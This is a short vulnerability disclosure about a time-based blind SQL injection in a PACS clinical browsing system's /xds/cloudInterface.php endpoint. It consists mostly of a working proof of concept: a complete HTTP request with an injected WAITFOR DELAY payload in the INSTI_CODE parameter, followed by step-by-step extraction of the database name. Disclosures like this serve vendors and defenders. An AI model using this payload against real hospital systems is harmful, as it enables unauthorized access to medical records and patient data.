There is a front-end SQL injection vulnerability in the clinical browsing system of Lanwang Technology Co., Ltd.
- Impact of vulnerabilities:PACS clinical browsing system
- Vulnerability location:/xds/cloudInterface.php
3.Recurrence of vulnerabilities The login interface is as shown in the figure
Since the SQL injection here is a time-based blind injection, the database name needs to be determined through ASSCII. The POC is as follows
Here, it is judged through truncation that the first position in the database is X
GET /xds/cloudInterface.php?INSTI_CODE=1%27);if%20(ascii(substring(db_name(),1,1)))=88%20WAITFOR%20DELAY%20%270:0:5%27--%20q HTTP/1.1
Host: ip:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9ppbslm6ue630ge9ptrdprb0d2
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.1.23
Here, it is judged through truncation that the second digit in the database is D.
Here, it is judged through truncation that the third digit in the database is S.
Here, it is judged through truncation that the fourth digit of the database is 7
Here, it is judged by truncation that the fifth bit of the database is 0
Here, it is judged through truncation that the sixth digit in the database is T
Here, it is determined through delayed injection that the name of the database is: XDS70T